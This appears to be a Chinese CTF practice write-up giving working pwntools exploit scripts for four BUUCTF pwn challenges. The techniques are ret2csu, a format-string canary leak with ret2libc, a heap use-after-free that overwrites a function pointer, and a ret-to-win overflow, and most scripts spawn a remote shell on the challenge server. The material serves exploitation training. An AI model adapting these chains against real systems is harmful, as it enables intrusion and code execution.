PWN-PRACTICE-BUUCTF-10
- jarvisoj_level3_x64
- bjdctf_2020_babyrop2
- hitcontraining_uaf
- jarvisoj_test_your_memory
jarvisoj_level3_x64
64位elf的栈溢出,ret2csu
import struct

from pwn import *
#context.log_level='debug'
#io=process('./jarvisoj_level3_x64')
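io = remote('node4.buuoj.cn', 29473)
elf = ELF('./jarvisoj_level3_x64')
# The remote libc is assumed to be this exact build; the system/"/bin/sh"
# offsets computed later are only valid for it.
libc = ELF('./libc-2.23-x64.so')

# ret2csu gadgets from __libc_csu_init: the pop tail and the mov/call body.
part1 = 0x4006AA  # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
part2 = 0x400690  # mov rdx,r13; mov rsi,r14; mov edi,r15d; call [r12+rbx*8]

write_plt = elf.plt['write']  # kept for reference; the chain goes through write@got instead
write_got = elf.got['write']
read_got = elf.got['read']
main_addr = elf.sym['main']
pop_rdi = 0x4006b3  # pop rdi; ret (the tail of part1)

io.recvuntil(b'Input:\n')
# 0x80 bytes reach the saved rbp, +8 covers rbp itself so the next qword is
# the return address (offsets taken from the original exploit).  A bytes
# literal keeps the concatenation with p64() output valid on Python 3.
payload = b'a' * (0x80 + 8)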
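def com_gadget(part1, part2, jmp2, arg1=0x0, arg2=0x0, arg3=0x0):
    """Build a ret2csu chain that calls ``[jmp2]`` with up to three arguments.

    ``part1`` is the pop tail of ``__libc_csu_init`` (pop rbx, rbp, r12, r13,
    r14, r15; ret) and ``part2`` its body, which moves r13->rdx, r14->rsi,
    r15d->edi and then does ``call [r12 + rbx*8]``.  ``jmp2`` must therefore be
    the address of a *pointer* to the target (e.g. a GOT slot), not the target.

    Returns the chain as ``bytes``; the caller appends the address to return to
    after the call.  Only the low 32 bits of ``arg1`` reach edi.
    """
    pack = struct.Struct('<Q').pack  # identical output to pwntools p64()
    chain = pack(part1)        # pop rbx, rbp, r12, r13, r14, r15 ; ret
    chain += pack(0x0)         # rbx = 0 -> call [r12 + 0]
    chain += pack(0x1)         # rbp = 1 -> csu loop exits after one iteration
    chain += pack(jmp2)        # r12 = address of the function pointer to call
    chain += pack(arg3)        # r13 -> rdx
    chain += pack(arg2)        # r14 -> rsi
    chain += pack(arg1)        # r15d -> edi (truncated to 32 bits)
    chain += pack(part2)       # mov/mov/mov ; call [r12 + rbx*8]
    chain += b'A' * 56         # add rsp,8 + six pops after the call: 7*8 bytes of junk
    return chain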
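# Stage 1: write(1, read@got, 8) through the csu gadgets, then return to main
# so the overflow can be triggered a second time.
payload += com_gadget(part1, part2, write_got, 1, read_got, 8)
payload += p64(main_addr)
io.sendline(payload)

# A userland pointer has only 6 non-zero low bytes; the remaining 2 bytes of
# the 8 written stay in the stream and are consumed by the next recvuntil.
read_addr = u64(io.recv(6).ljust(8, b'\x00'))
print(hex(read_addr))

libc_base = read_addr - libc.sym['read']
# A libc base is page-aligned; anything else means the leak or the assumed
# libc build is wrong, and the computed addresses would crash the target.
if libc_base & 0xfff:
    log.error('unaligned libc base %#x: bad leak or wrong libc' % libc_base)
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))

# Stage 2: system("/bin/sh"); main_addr serves as the return address after
# system() so the process does not crash immediately.
io.recvuntil(b'Input:\n')
payload = b'a' * (0x80 + 8) + p64(pop_rdi) + p64(binsh) + p64(system) + p64(main_addr)
io.sendline(payload)
io.interactive()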
bjdctf_2020_babyrop2
格式化字符串泄露canary,然后栈溢出ret2libc
from pwn import *
#context.log_level='debug'
#io=process('./bjdctf_2020_babyrop2')
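io = remote('node4.buuoj.cn', 28650)
elf = ELF('./bjdctf_2020_babyrop2')
# The remote libc is assumed to be this build; offsets below depend on it.
libc = ELF('./libc-2.23-x64.so')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
vuln_addr = elf.sym['vuln']
pop_rdi = 0x400993  # pop rdi; ret

# Step 1: the format-string bug leaks the stack canary (7th vararg slot).
io.recvuntil(b'help u!\n')
io.sendline(b'%7$lx')
canary = int(io.recvuntil(b'\n')[:-1], 16)
print(hex(canary))
# glibc canaries have a zero low byte; anything else means the offset is wrong
# and the overflow below would just abort with *** stack smashing detected ***.
if canary & 0xff:
    log.warning('canary %#x has a non-zero low byte: check the %%7$lx offset' % canary)

# Step 2: overflow vuln()'s 0x20-byte frame keeping the canary intact, leak
# puts@got with puts(), and return into vuln() for a second round.
io.recvuntil(b'story!\n')
payload = b'a' * (0x20 - 8) + p64(canary) + b'b' * 8
payload += p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln_addr)
io.sendline(payload)
# puts() emits the 6 non-zero bytes of the pointer followed by '\n'.
puts_addr = u64(io.recv(6).ljust(8, b'\x00'))
print(hex(puts_addr))

libc_base = puts_addr - libc.sym['puts']
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))

# Step 3: same layout, now calling system("/bin/sh").
payload1 = b'a' * (0x20 - 8) + p64(canary) + b'b' * 8
payload1 += p64(pop_rdi) + p64(binsh) + p64(system) + p64(vuln_addr)
io.recvuntil(b'story!\n')
io.sendline(payload1)
io.interactive()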
hitcontraining_uaf
参考:[BUUCTF]PWN——hitcontraining_uaf
from pwn import*
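io = remote('node4.buuoj.cn', 26666)
# io = process('./hacknote')
elf = ELF('./hacknote')


def add(size, content):
    """Menu option 1: create a note of ``size`` bytes with ``content``."""
    io.sendlineafter(b'choice :', b'1')
    io.sendlineafter(b'Note size :', str(size).encode())
    io.sendlineafter(b'Content :', content)


def delete(idx):
    """Menu option 2: free note ``idx`` (its pointer presumably stays in the table)."""
    io.sendlineafter(b'choice :', b'2')
    io.sendlineafter(b'Index :', str(idx).encode())


def print_(idx):
    """Menu option 3: print note ``idx`` through its stored function pointer."""
    io.sendlineafter(b'choice :', b'3')
    io.sendlineafter(b'Index :', str(idx).encode())


magic = 0x8048945  # address the hijacked note function pointer is pointed at

add(0x10, b'aaaa')
add(0x10, b'bbbb')
delete(0)
delete(1)
# Per the referenced write-up: an 8-byte note is served from the two freed
# note headers, so its content lands on note 0's header and overwrites the
# function pointer with magic.
add(8, p32(magic))
print_(0)  # note 0 is used after free -> calls magic
io.interactive()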
jarvisoj_test_your_memory
题目给出了字符串"cat flag"的地址
mem_test函数中存在栈溢出漏洞
ret到win_func函数,字符串"cat flag"的地址作为参数,执行system("cat flag")打印flag
from pwn import *
#context.log_level='debug'
#io=process('./memory')
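io = remote('node4.buuoj.cn', 25669)
win_func = 0x080485BD   # runs system() on its first argument (see write-up above)
flag_addr = 0x080487E0  # address of the "cat flag" string inside the binary
# i386 cdecl: after the overwritten return address comes the return address
# for win_func itself (0x08048677, presumably only needs to be a mapped
# address) and then win_func's first argument.
payload = b'a' * (0x13 + 4) + p32(win_func) + p32(0x08048677) + p32(flag_addr)
io.sendline(payload)
io.interactive()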